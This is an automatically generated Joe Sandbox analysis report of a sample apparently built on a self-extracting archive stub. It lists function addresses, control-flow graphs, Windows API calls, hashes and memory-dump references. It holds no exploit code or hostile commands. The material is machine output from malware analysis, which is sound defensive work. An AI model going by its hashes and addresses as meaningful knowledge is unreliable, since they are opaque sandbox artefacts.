                                          • Opcode Fuzzy Hash: e706611e6e1b38a991edbcdbb1d5f3ff7590dd17d8edf28e6f22295657617f24
                                          • Instruction Fuzzy Hash: BB11A776E45225ABCF218B589C8175937A59F437B0F250210F915EB290E774EF00AAE1
                                          Function 00F898E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 993 f898e0-f89901 call f9ec50 996 f8990c 993->996 997 f89903-f89906 993->997 999 f8990e-f8991f 996->999 997->996 998 f89908-f8990a 997->998 998->999 1000 f89921 999->1000 1001 f89927-f89931 999->1001 1000->1001 1002 f89933 1001->1002 1003 f89936-f89943 call f86edb 1001->1003 1002->1003 1006 f8994b-f8996a CreateFileW 1003->1006 1007 f89945 1003->1007 1008 f899bb-f899bf 1006->1008 1009 f8996c-f8998e GetLastError call f8bb03 1006->1009 1007->1006 1011 f899c3-f899c6 1008->1011 1013 f899c8-f899cd 1009->1013 1017 f89990-f899b3 CreateFileW GetLastError 1009->1017 1011->1013 1014 f899d9-f899de 1011->1014 1013->1014 1018 f899cf 1013->1018 1015 f899ff-f89a10 1014->1015 1016 f899e0-f899e3 1014->1016 1020 f89a2e-f89a39 1015->1020 1021 f89a12-f89a2a call f90602 1015->1021 1016->1015 1019 f899e5-f899f9 SetFileTime 1016->1019 1017->1011 1022 f899b5-f899b9 1017->1022 1018->1014 1019->1015 1021->1020 1022->1011
                                          APIs
                                          • CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00F87760,?,00000005,?,00000011), ref: 00F8995F
                                          • GetLastError.KERNEL32(?,?,00F87760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F8996C
                                          • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00F87760,?,00000005,?), ref: 00F899A2
                                          • GetLastError.KERNEL32(?,?,00F87760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F899AA
                                          • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00F87760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F899F9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: File$CreateErrorLast$Time
                                          • String ID:
                                          • API String ID: 1999340476-0
                                          • Opcode ID: b69dc9b3a0c502621b7d17078d99c4b2c258402de1367333b984fef14876c164
                                          • Instruction ID: b4716e6ea14f662ca0589ce9081d51df6e72e89a2a5ca0cfd33d3939df1c24bd
                                          • Opcode Fuzzy Hash: b69dc9b3a0c502621b7d17078d99c4b2c258402de1367333b984fef14876c164
                                          • Instruction Fuzzy Hash: C2312730988745AFE730AF24CC85BEABB94BB44334F140B1DF5A1961D0D7F49944EB91
                                          Function 00F9B568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1052 f9b568-f9b581 PeekMessageW 1053 f9b5bc-f9b5be 1052->1053 1054 f9b583-f9b597 GetMessageW 1052->1054 1055 f9b599-f9b5a6 IsDialogMessageW 1054->1055 1056 f9b5a8-f9b5b6 TranslateMessage DispatchMessageW 1054->1056 1055->1053 1055->1056 1056->1053
                                          APIs
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F9B579
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F9B58A
                                          • IsDialogMessageW.USER32(0001040C,?), ref: 00F9B59E
                                          • TranslateMessage.USER32(?), ref: 00F9B5AC
                                          • DispatchMessageW.USER32(?), ref: 00F9B5B6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Message$DialogDispatchPeekTranslate
                                          • String ID:
                                          • API String ID: 1266772231-0
                                          • Opcode ID: bd4604e03afcac5547861dc7df281a70910d7332f9c5fc148da6c95a28dc9b7d
                                          • Instruction ID: 9cf38dd8840b97bfa6e3e16be86313a66e14d45743afd87433ac1b565c17697c
                                          • Opcode Fuzzy Hash: bd4604e03afcac5547861dc7df281a70910d7332f9c5fc148da6c95a28dc9b7d
                                          • Instruction Fuzzy Hash: E3F0BD71E0116EAB9F20DBE5AD8CDEB7FACEE053A57444415B505D3014EB34D605DBB0
                                          Function 00F9ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1057 f9abab-f9abca GetClassNameW 1058 f9abcc-f9abe1 call f91fbb 1057->1058 1059 f9abf2-f9abf4 1057->1059 1064 f9abf1 1058->1064 1065 f9abe3-f9abef FindWindowExW 1058->1065 1061 f9abff-f9ac01 1059->1061 1062 f9abf6-f9abf9 SHAutoComplete 1059->1062 1062->1061 1064->1059 1065->1064
                                          APIs
                                          • GetClassNameW.USER32(?,?,00000050), ref: 00F9ABC2
                                          • SHAutoComplete.SHLWAPI(?,00000010), ref: 00F9ABF9
                                            • Part of subcall function 00F91FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00F8C116,00000000,.exe,?,?,00000800,?,?,?,00F98E3C), ref: 00F91FD1
                                          • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00F9ABE9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AutoClassCompareCompleteFindNameStringWindow
                                          • String ID: EDIT
                                          • API String ID: 4243998846-3080729518
                                          • Opcode ID: d8a3367d5e3652671ca69e7792493aac6be5511f10c923b6bee15b7f60b80630
                                          • Instruction ID: 0ca69a64f8609386b126f199732de841286e711677f1a8f46b79bbb4ecdd248f
                                          • Opcode Fuzzy Hash: d8a3367d5e3652671ca69e7792493aac6be5511f10c923b6bee15b7f60b80630
                                          • Instruction Fuzzy Hash: 15F08932A0022D76EF20AA265C4DFDB766C9B86B50F484061BA05A7180D764EA4195F6
                                          Function 00F9AC16 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34comCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00F9081B: GetSystemDirectoryW.KERNEL32(?,00000800,00FC81C8,?,00F8F2D8,Crypt32.dll,00000000,00F8F35C,?,?,00F8F33E,?,?,?,?), ref: 00F90836
                                            • Part of subcall function 00F9081B: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00F8F2D8,Crypt32.dll,00000000,00F8F35C,?,?,00F8F33E,?,?,?), ref: 00F90858
                                          • OleInitialize.OLE32(00000000), ref: 00F9AC2F
                                          • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00F9AC66
                                          • SHGetMalloc.SHELL32(00FC8438), ref: 00F9AC70
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                          • String ID: riched20.dll
                                          • API String ID: 3498096277-3360196438
                                          • Opcode ID: b9d158b0b0eff2759dd860d283a14973f3724acaf85deea44cad30ab01e07a0b
                                          • Instruction ID: 5a92bdb05100ceb22428f9531f1e66ab14b66d855cbfa2cf81d99abc84108d1e
                                          • Opcode Fuzzy Hash: b9d158b0b0eff2759dd860d283a14973f3724acaf85deea44cad30ab01e07a0b
                                          • Instruction Fuzzy Hash: C9F049B1D00249ABCB10AFA9DD4D9EFFBFCEF84704F00405AA401A2201CBB89605DFA1
                                          Function 00F9DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1070 f9dbde-f9dc09 call f9ec50 SetEnvironmentVariableW call f90371 1074 f9dc0e-f9dc12 1070->1074 1075 f9dc14-f9dc18 1074->1075 1076 f9dc36-f9dc38 1074->1076 1077 f9dc21-f9dc28 call f9048d 1075->1077 1080 f9dc1a-f9dc20 1077->1080 1081 f9dc2a-f9dc30 SetEnvironmentVariableW 1077->1081 1080->1077 1081->1076
                                          APIs
                                          • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00F9DBF4
                                          • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00F9DC30
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: EnvironmentVariable
                                          • String ID: sfxcmd$sfxpar
                                          • API String ID: 1431749950-3493335439
                                          • Opcode ID: 068ce14c997f3c6d6a49577b1720f4432808ca1aa41e606166c77f334e43c4ac
                                          • Instruction ID: 1a121d802a7a9da2994bcfb8456e3a15f9c103a1c41566fe02d9072f7f0f53b1
                                          • Opcode Fuzzy Hash: 068ce14c997f3c6d6a49577b1720f4432808ca1aa41e606166c77f334e43c4ac
                                          • Instruction Fuzzy Hash: 52F0EC72804238ABEF202F999C06FFA775CAF04B81B040411BD85A5151DAB4C940FAB1
                                          Function 00F89785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1082 f89785-f89791 1083 f8979e-f897b5 ReadFile 1082->1083 1084 f89793-f8979b GetStdHandle 1082->1084 1085 f89811 1083->1085 1086 f897b7-f897c0 call f898bc 1083->1086 1084->1083 1087 f89814-f89817 1085->1087 1090 f897d9-f897dd 1086->1090 1091 f897c2-f897ca 1086->1091 1092 f897ee-f897f2 1090->1092 1093 f897df-f897e8 GetLastError 1090->1093 1091->1090 1094 f897cc 1091->1094 1096 f8980c-f8980f 1092->1096 1097 f897f4-f897fc 1092->1097 1093->1092 1095 f897ea-f897ec 1093->1095 1098 f897cd-f897d7 call f89785 1094->1098 1095->1087 1096->1087 1097->1096 1099 f897fe-f89807 GetLastError 1097->1099 1098->1087 1099->1096 1102 f89809-f8980a 1099->1102 1102->1098
                                          APIs
                                          • GetStdHandle.KERNEL32(000000F6), ref: 00F89795
                                          • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00F897AD
                                          • GetLastError.KERNEL32 ref: 00F897DF
                                          • GetLastError.KERNEL32 ref: 00F897FE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ErrorLast$FileHandleRead
                                          • String ID:
                                          • API String ID: 2244327787-0
                                          • Opcode ID: ef3ff52237bf47067efb831f9abd467e8658e64551431b721cdf0b5d1848f8e2
                                          • Instruction ID: 7f8f6da1c918314683d77bbae58a6c242a03d98bb6efb458b455442235482c13
                                          • Opcode Fuzzy Hash: ef3ff52237bf47067efb831f9abd467e8658e64551431b721cdf0b5d1848f8e2
                                          • Instruction Fuzzy Hash: B8117C31918209EBDF207F64CC44AFD3BA9BF42774F588A29E41685190D7F49E44FB61
                                          Function 00FAAD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00F8D710,00000000,00000000,?,00FAACDB,00F8D710,00000000,00000000,00000000,?,00FAAED8,00000006,FlsSetValue), ref: 00FAAD66
                                          • GetLastError.KERNEL32(?,00FAACDB,00F8D710,00000000,00000000,00000000,?,00FAAED8,00000006,FlsSetValue,00FB7970,FlsSetValue,00000000,00000364,?,00FA98B7), ref: 00FAAD72
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00FAACDB,00F8D710,00000000,00000000,00000000,?,00FAAED8,00000006,FlsSetValue,00FB7970,FlsSetValue,00000000), ref: 00FAAD80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: LibraryLoad$ErrorLast
                                          • String ID:
                                          • API String ID: 3177248105-0
                                          • Opcode ID: a0ce91668720f39db3e695a671f1722cf138668190c60dceff3ce8028b2690ad
                                          • Instruction ID: 99e47036cfdd4a530805e5efa7c35ca32850b963e2ce8f362970852cdb7eacf8
                                          • Opcode Fuzzy Hash: a0ce91668720f39db3e695a671f1722cf138668190c60dceff3ce8028b2690ad
                                          • Instruction Fuzzy Hash: D0017B7765133AABC7224B68DC84A577B9CEF467B37100720FC46D7650D721D808EAE1
                                          Function 00F89F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00F8D343,00000001,?,?,?,00000000,00F9551D,?,?,?), ref: 00F89F9E
                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00F9551D,?,?,?,?,?,00F94FC7,?), ref: 00F89FE5
                                          • WriteFile.KERNEL32(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00F8D343,00000001,?,?), ref: 00F8A011
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: FileWrite$Handle
                                          • String ID:
                                          • API String ID: 4209713984-0
                                          • Opcode ID: 7c30eaab50601ce8116dc575b79a13394392f923b1da3fecba6532ed2ea8e758
                                          • Instruction ID: ee8492041978064c0c26ebe576c987e2e4e98f6b9eefe53de781bd4cc11cf3e9
                                          • Opcode Fuzzy Hash: 7c30eaab50601ce8116dc575b79a13394392f923b1da3fecba6532ed2ea8e758
                                          • Instruction Fuzzy Hash: 31310432648305AFEB14EF20D809BBE77A5FF80724F04061DF5819B290C775AD48EBA2
                                          Function 00F8A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00F8C27E: _wcslen.LIBCMT ref: 00F8C284
                                          • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00F8A175,?,00000001,00000000,?,?), ref: 00F8A2D9
                                          • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00F8A175,?,00000001,00000000,?,?), ref: 00F8A30C
                                          • GetLastError.KERNEL32(?,?,?,?,00F8A175,?,00000001,00000000,?,?), ref: 00F8A329
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: CreateDirectory$ErrorLast_wcslen
                                          • String ID:
                                          • API String ID: 2260680371-0
                                          • Opcode ID: 16adf00cdcb8ee69562922963857a2004a7a0300e7bc04ff9d075cf033e9f963
                                          • Instruction ID: f12dcc2024b796de39ee01477525d8fbb42097cb113d4808b061db362b8a9214
                                          • Opcode Fuzzy Hash: 16adf00cdcb8ee69562922963857a2004a7a0300e7bc04ff9d075cf033e9f963
                                          • Instruction Fuzzy Hash: 8801D431A00614AAFF32BB754C49BFD3348EF0A795F04441AF901E6095DB6ACA81F7B2
                                          Function 00FAB893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00FAB8B8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Info
                                          • String ID:
                                          • API String ID: 1807457897-3916222277
                                          • Opcode ID: 127abe02c39b937002dc1c9539b49a448e721a5f74cf5ad2698f6c7695ba30b2
                                          • Instruction ID: ccbc2e4b278cef8d41a803ed02351395e7995b2c8d9737f9661a070214acf78f
                                          • Opcode Fuzzy Hash: 127abe02c39b937002dc1c9539b49a448e721a5f74cf5ad2698f6c7695ba30b2
                                          • Instruction Fuzzy Hash: D941C9B190424C9ADB218E68CC84BF6BBB9EB5A304F1404EDD59A86143D3359A45EF61
                                          Function 00FAAF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00FAAFDD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: String
                                          • String ID: LCMapStringEx
                                          • API String ID: 2568140703-3893581201
                                          • Opcode ID: 0a4e86b2bd363418399d4534cc283bf40f4e2e6ebeaeba45bed07d716030bcba
                                          • Instruction ID: 41b5571e1b652a95bffb6900148ecdca5a63d58b7444b53392843e80e29e0a81
                                          • Opcode Fuzzy Hash: 0a4e86b2bd363418399d4534cc283bf40f4e2e6ebeaeba45bed07d716030bcba
                                          • Instruction Fuzzy Hash: 10010272644209BBCF02AFA1DC06DEE7F62EB49760F014254FE1466160CA368A21FF91
                                          Function 00FAAF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                          Download Yara Rule
                                          APIs
                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00FAA56F), ref: 00FAAF55
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: CountCriticalInitializeSectionSpin
                                          • String ID: InitializeCriticalSectionEx
                                          • API String ID: 2593887523-3084827643
                                          • Opcode ID: 4675c1069cdb666a21c6829ea51f000cb5e2f69c33c00a51a41d8d4f9af97119
                                          • Instruction ID: cf84dab9b54fda9b7b08060b00450e4003577ad6b34ee41a66b3bf47ce5a43b4
                                          • Opcode Fuzzy Hash: 4675c1069cdb666a21c6829ea51f000cb5e2f69c33c00a51a41d8d4f9af97119
                                          • Instruction Fuzzy Hash: 21F09A71A8520CBFCB066F55CC06DAEBB65EF45B21B404164F808AA260DA319A10FB86
                                          Function 00FAADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Alloc
                                          • String ID: FlsAlloc
                                          • API String ID: 2773662609-671089009
                                          • Opcode ID: 0690292867cf1e5128d01d6ccabf3f886128aa5a668f7a8e7d93482beac3cfd4
                                          • Instruction ID: a309a2f9c760af67a3996a4285bd20d349d67c02336c4008a81272803eb5fe83
                                          • Opcode Fuzzy Hash: 0690292867cf1e5128d01d6ccabf3f886128aa5a668f7a8e7d93482beac3cfd4
